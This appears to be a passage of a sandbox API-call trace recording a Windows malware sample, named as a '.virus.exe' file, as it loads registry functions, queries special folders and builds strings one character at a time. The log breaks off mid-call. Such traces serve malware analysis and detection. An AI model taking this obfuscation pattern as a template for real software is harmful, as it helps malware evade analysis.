0x0 [0083.934] SetLastError (dwErrCode=0x0) [0083.935] GetProcAddress (hModule=0x72ec0000, lpProcName="SxsOleAut32RedirectTypeLibrary") returned 0x72ec207d [0083.936] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="ADVAPI32.dll", cbMultiByte=12, lpWideCharStr=0x28d418, cchWideChar=2047 | out: lpWideCharStr="ADVAPI32.dll") returned 12 [0083.936] SysReAllocStringLen (in: pbstr=0x28e41c*=0x0, psz="ADVAPI32.dll", len=0xc | out: pbstr=0x28e41c*="ADVAPI32.dll") returned 1 [0083.936] CharLowerBuffW (in: lpsz="ADVAPI32.dll", cchLength=0xc | out: lpsz="advapi32.dll") returned 0xc [0083.936] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x76f40000 [0083.936] GetLastError () returned 0x0 [0083.937] SetLastError (dwErrCode=0x0) [0083.937] GetProcAddress (hModule=0x76f40000, lpProcName="RegOpenKeyW") returned 0x76f52459 [0083.938] GetProcAddress (hModule=0x76f40000, lpProcName="RegQueryValueW") returned 0x76f544b4 [0083.949] GetProcAddress (hModule=0x72ec0000, lpProcName="SxsOleAut32MapConfiguredClsidToReferenceClsid") returned 0x72ec171e [0083.949] FileSystemObject:IUnknown:QueryInterface (in: This=0x1072be0, riid=0x72970540*(Data1=0x7fd52380, Data2=0x4e07, Data3=0x101b, Data4=([0]=0xae, [1]=0x2d, [2]=0x8, [3]=0x0, [4]=0x2b, [5]=0x2e, [6]=0xc7, [7]=0x13)), ppvObject=0x28f704 | out: ppvObject=0x28f704*=0x0) returned 0x80004002 [0083.949] FileSystemObject:IUnknown:QueryInterface (in: This=0x1072be0, riid=0x72970750*(Data1=0x37d84f60, Data2=0x42cb, Data3=0x11ce, Data4=([0]=0x81, [1]=0x35, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xb8, [7]=0x51)), ppvObject=0x28f708 | out: ppvObject=0x28f708*=0x0) returned 0x80004002 [0083.949] FileSystemObject:IUnknown:QueryInterface (in: This=0x1072be0, riid=0x72970450*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28f6d4 | out: ppvObject=0x28f6d4*=0x1072be0) returned 0x0 [0083.949] FileSystemObject:IUnknown:Release (This=0x1072be0) returned 0x1 [0083.951] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x1072be0, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f6a0*="getspecialfolder", cNames=0x1, lcid=0x409, rgDispId=0x28f6a4 | out: rgDispId=0x28f6a4*=10014) returned 0x0 [0083.951] FileSystemObject:IDispatch:Invoke (in: This=0x1072be0, dispIdMember=10014, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f674*(rgvarg=([0]=0x28f6fc*(varType=0x2, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f908, pExcepInfo=0x28f654, puArgErr=0x28f684 | out: pDispParams=0x28f674*(rgvarg=([0]=0x28f6fc*(varType=0x2, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f908*(varType=0x9, wReserved1=0x0, wReserved2=0x18, wReserved3=0x0, varVal1=0x1072c3c, varVal2=0x0), pExcepInfo=0x28f654*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f684*=0x72a478d9) returned 0x0 [0083.952] FileSystemObject:IUnknown:AddRef (This=0x1072c3c) returned 0x2 [0083.952] FileSystemObject:IUnknown:Release (This=0x1072c3c) returned 0x1 [0083.952] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x1072be0, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f6a0*="getspecialfolder", cNames=0x1, lcid=0x409, rgDispId=0x28f6a4 | out: rgDispId=0x28f6a4*=10014) returned 0x0 [0083.953] FileSystemObject:IDispatch:Invoke (in: This=0x1072be0, dispIdMember=10014, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f674*(rgvarg=([0]=0x28f6fc*(varType=0x2, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f908, pExcepInfo=0x28f654, puArgErr=0x28f684 | out: pDispParams=0x28f674*(rgvarg=([0]=0x28f6fc*(varType=0x2, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f908*(varType=0x9, wReserved1=0x0, wReserved2=0x18, wReserved3=0x0, varVal1=0x1072cec, varVal2=0x0), pExcepInfo=0x28f654*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f684*=0x72a478d9) returned 0x0 [0083.953] FileSystemObject:IUnknown:AddRef (This=0x1072cec) returned 0x2 [0083.953] FileSystemObject:IUnknown:Release (This=0x1072cec) returned 0x1 [0083.955] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0xfc) returned 0x310bbb8 [0083.955] GetCurrentThreadId () returned 0xf38 [0083.955] GetCurrentThreadId () returned 0xf38 [0083.955] GetCurrentThreadId () returned 0xf38 [0083.955] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x12) returned 0x3102ad8 [0083.955] SetWindowTextA (hWnd=0x6006a, lpString="Using Shell32.dll") returned 1 [0083.955] NtdllDefWindowProc_A (hWnd=0x6006a, Msg=0xc, wParam=0x0, lParam=0x3102ad8) returned 0x1 [0083.955] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x1) returned 0x310bcc0 [0083.956] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x12) returned 0x3102af8 [0083.956] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x12) returned 0x3102b18 [0083.956] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x15) returned 0x3102b38 [0083.956] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x28f568, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe")) returned 0x45 [0083.956] lstrcpynA (in: lpString1=0x28f454, lpString2="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe", iMaxLength=260 | out: lpString1="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe") returned="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" [0083.956] lstrlenA (lpString="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe") returned 69 [0083.956] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x46) returned 0x310bcd0 [0083.956] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x46) returned 0x310bd20 [0083.956] lstrcpyA (in: lpString1=0x310bcd0, lpString2="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" | out: lpString1="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe") returned="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" [0083.961] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x1b) returned 0x310bd70 [0083.961] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310bd20 | out: hHeap=0x30f0000) returned 1 [0083.962] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310bcd0 | out: hHeap=0x30f0000) returned 1 [0083.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C:\\Users\\kEecfMwgj\\Desktop", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0083.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C:\\Users\\kEecfMwgj\\Desktop", cbMultiByte=-1, lpWideCharStr=0xe37254, cchWideChar=27 | out: lpWideCharStr="C:\\Users\\kEecfMwgj\\Desktop") returned 27 [0083.962] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310bd70 | out: hHeap=0x30f0000) returned 1 [0083.963] SysStringLen (param_1="C:\\Users\\kEecfMwgj\\Desktop") returned 0x1a [0083.964] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\kEecfMwgj\\Desktop", cchWideChar=27, lpMultiByteStr=0xe3705c, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\kEecfMwgj\\Desktop", lpUsedDefaultChar=0x0) returned 27 [0083.966] SetWindowTextA (hWnd=0x5005e, lpString="C:\\Users\\kEecfMwgj\\Desktop") returned 1 [0083.966] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x5005e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x5 [0083.966] GetFocus () returned 0x0 [0083.966] lstrlenA (lpString="C:\\Users\\kEecfMwgj\\Desktop") returned 26 [0083.966] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x5005e, Msg=0xc, wParam=0x0, lParam=0xe3705c) returned 0x1 [0083.967] IsWindow (hWnd=0x5005e) returned 1 [0083.967] IsWindow (hWnd=0x5005e) returned 1 [0083.967] IsWindow (hWnd=0x5005e) returned 1 [0083.967] IsWindow (hWnd=0x5005e) returned 1 [0083.967] GetFocus () returned 0x0 [0083.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="O", cchWideChar=1, lpMultiByteStr=0x28f70a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O", lpUsedDefaultChar=0x0) returned 1 [0083.969] VarAdd (in: pvarLeft=0x28f96c, pvarRight=0x28f898, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.969] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0xe40de4, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0083.970] VarCat (in: pvarLeft=0x28f9bc, pvarRight=0x28f93c, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="T", cchWideChar=1, lpMultiByteStr=0x28f70a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="T", lpUsedDefaultChar=0x0) returned 1 [0083.970] VarAdd (in: pvarLeft=0x28f96c, pvarRight=0x28f898, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.970] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0xe40ccc, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0083.970] VarCat (in: pvarLeft=0x28f9bc, pvarRight=0x28f93c, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f70a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i", lpUsedDefaultChar=0x0) returned 1 [0083.971] VarAdd (in: pvarLeft=0x28f96c, pvarRight=0x28f898, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="v", cbMultiByte=1, lpWideCharStr=0xe40c54, cchWideChar=1 | out: lpWideCharStr="v") returned 1 [0083.971] VarCat (in: pvarLeft=0x28f9bc, pvarRight=0x28f93c, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x28f70a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="f", lpUsedDefaultChar=0x0) returned 1 [0083.971] VarAdd (in: pvarLeft=0x28f96c, pvarRight=0x28f898, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe40de4, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0083.971] VarCat (in: pvarLeft=0x28f9bc, pvarRight=0x28f93c, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.972] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x28f70a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V", lpUsedDefaultChar=0x0) returned 1 [0083.972] VarAdd (in: pvarLeft=0x28f96c, pvarRight=0x28f898, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="c", cbMultiByte=1, lpWideCharStr=0xe40ccc, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0083.972] VarCat (in: pvarLeft=0x28f9bc, pvarRight=0x28f93c, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.972] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="T", cchWideChar=1, lpMultiByteStr=0x28f70a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="T", lpUsedDefaultChar=0x0) returned 1 [0083.972] VarAdd (in: pvarLeft=0x28f96c, pvarRight=0x28f898, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0xe40c54, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0083.973] VarCat (in: pvarLeft=0x28f9bc, pvarRight=0x28f93c, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="a", cchWideChar=1, lpMultiByteStr=0x28f70a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="a", lpUsedDefaultChar=0x0) returned 1 [0083.973] VarAdd (in: pvarLeft=0x28f96c, pvarRight=0x28f898, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe40de4, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0083.973] VarCat (in: pvarLeft=0x28f9bc, pvarRight=0x28f93c, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="!", cchWideChar=1, lpMultiByteStr=0x28f70a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="!", lpUsedDefaultChar=0x0) returned 1 [0083.974] VarAdd (in: pvarLeft=0x28f96c, pvarRight=0x28f898, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=".", cbMultiByte=1, lpWideCharStr=0xe40ccc, cchWideChar=1 | out: lpWideCharStr=".") returned 1 [0083.974] VarCat (in: pvarLeft=0x28f9bc, pvarRight=0x28f93c, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="X", cchWideChar=1, lpMultiByteStr=0x28f70a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="X", lpUsedDefaultChar=0x0) returned 1 [0083.974] VarAdd (in: pvarLeft=0x28f96c, pvarRight=0x28f898, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0xe40c54, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0083.975] VarCat (in: pvarLeft=0x28f9bc, pvarRight=0x28f93c, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.975] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="k", cchWideChar=1, lpMultiByteStr=0x28f70a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="k", lpUsedDefaultChar=0x0) returned 1 [0083.975] VarAdd (in: pvarLeft=0x28f96c, pvarRight=0x28f898, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="x", cbMultiByte=1, lpWideCharStr=0xe40de4, cchWideChar=1 | out: lpWideCharStr="x") returned 1 [0083.975] VarCat (in: pvarLeft=0x28f9bc, pvarRight=0x28f93c, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.975] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="X", cchWideChar=1, lpMultiByteStr=0x28f70a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="X", lpUsedDefaultChar=0x0) returned 1 [0083.976] VarAdd (in: pvarLeft=0x28f96c, pvarRight=0x28f898, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.976] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0xe40ccc, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0083.976] VarCat (in: pvarLeft=0x28f9bc, pvarRight=0x28f93c, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.977] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="4", cchWideChar=1, lpMultiByteStr=0x28f70a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="4", lpUsedDefaultChar=0x0) returned 1 [0083.977] VarAdd (in: pvarLeft=0x28f92c, pvarRight=0x28f898, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0xe40c54, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0083.977] VarCat (in: pvarLeft=0x28f97c, pvarRight=0x28f9cc, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.977] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="I", cchWideChar=1, lpMultiByteStr=0x28f70a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="I", lpUsedDefaultChar=0x0) returned 1 [0083.977] VarAdd (in: pvarLeft=0x28f92c, pvarRight=0x28f898, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="V", cbMultiByte=1, lpWideCharStr=0xe40c7c, cchWideChar=1 | out: lpWideCharStr="V") returned 1 [0083.978] VarCat (in: pvarLeft=0x28f97c, pvarRight=0x28f9cc, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.978] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="F", cchWideChar=1, lpMultiByteStr=0x28f70a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="F", lpUsedDefaultChar=0x0) returned 1 [0083.978] VarAdd (in: pvarLeft=0x28f92c, pvarRight=0x28f898, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0xe40ca4, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0083.978] VarCat (in: pvarLeft=0x28f97c, pvarRight=0x28f9cc, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.979] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="6", cchWideChar=1, lpMultiByteStr=0x28f70a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="6", lpUsedDefaultChar=0x0) returned 1 [0083.979] VarAdd (in: pvarLeft=0x28f92c, pvarRight=0x28f898, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.979] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C", cbMultiByte=1, lpWideCharStr=0xe40c54, cchWideChar=1 | out: lpWideCharStr="C") returned 1 [0083.979] VarCat (in: pvarLeft=0x28f97c, pvarRight=0x28f9cc, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.979] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="4", cchWideChar=1, lpMultiByteStr=0x28f70a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="4", lpUsedDefaultChar=0x0) returned 1 [0083.979] VarAdd (in: pvarLeft=0x28f92c, pvarRight=0x28f898, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0xe40c7c, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0083.980] VarCat (in: pvarLeft=0x28f97c, pvarRight=0x28f9cc, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.980] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A", cchWideChar=1, lpMultiByteStr=0x28f70a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A", lpUsedDefaultChar=0x0) returned 1 [0083.980] VarAdd (in: pvarLeft=0x28f92c, pvarRight=0x28f898, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="N", cbMultiByte=1, lpWideCharStr=0xe40ca4, cchWideChar=1 | out: lpWideCharStr="N") returned 1 [0083.980] VarCat (in: pvarLeft=0x28f97c, pvarRight=0x28f9cc, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.981] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=";", cchWideChar=1, lpMultiByteStr=0x28f70a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=";", lpUsedDefaultChar=0x0) returned 1 [0083.981] VarAdd (in: pvarLeft=0x28fa34, pvarRight=0x28f898, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.981] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="H", cbMultiByte=1, lpWideCharStr=0xe40c54, cchWideChar=1 | out: lpWideCharStr="H") returned 1 [0083.981] VarCat (in: pvarLeft=0x28f98c, pvarRight=0x28f94c, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="B", cchWideChar=1, lpMultiByteStr=0x28f70a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="B", lpUsedDefaultChar=0x0) returned 1 [0083.982] VarAdd (in: pvarLeft=0x28fa34, pvarRight=0x28f898, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="O", cbMultiByte=1, lpWideCharStr=0xe3ee94, cchWideChar=1 | out: lpWideCharStr="O") returned 1 [0083.982] VarCat (in: pvarLeft=0x28f98c, pvarRight=0x28f94c, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="F", cchWideChar=1, lpMultiByteStr=0x28f70a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="F", lpUsedDefaultChar=0x0) returned 1 [0083.982] VarAdd (in: pvarLeft=0x28fa34, pvarRight=0x28f898, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.983] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0xe3eeac, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0083.983] VarCat (in: pvarLeft=0x28f98c, pvarRight=0x28f94c, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.983] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="G", cchWideChar=1, lpMultiByteStr=0x28f70a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="G", lpUsedDefaultChar=0x0) returned 1 [0083.983] VarAdd (in: pvarLeft=0x28fa34, pvarRight=0x28f898, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.983] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="T", cbMultiByte=1, lpWideCharStr=0xe40c54, cchWideChar=1 | out: lpWideCharStr="T") returned 1 [0083.983] VarCat (in: pvarLeft=0x28f98c, pvarRight=0x28f94c, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.984] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="F", cchWideChar=1, lpMultiByteStr=0x28f70a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="F", lpUsedDefaultChar=0x0) returned 1 [0083.984] VarAdd (in: pvarLeft=0x28fa34, pvarRight=0x28f898, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.984] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0xe3ee94, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0083.984] VarCat (in: pvarLeft=0x28f98c, pvarRight=0x28f94c, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.985] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="O", cchWideChar=1, lpMultiByteStr=0x28f70a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O", lpUsedDefaultChar=0x0) returned 1 [0083.985] VarAdd (in: pvarLeft=0x28fa44, pvarRight=0x28f898, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.985] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0xe4a884, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0083.985] VarCat (in: pvarLeft=0x28fa14, pvarRight=0x28fa04, pvarResult=0x28f908 | out: pvarResult=0x28f908) returned 0x0 [0083.985] WideCharToMultiByte (in: 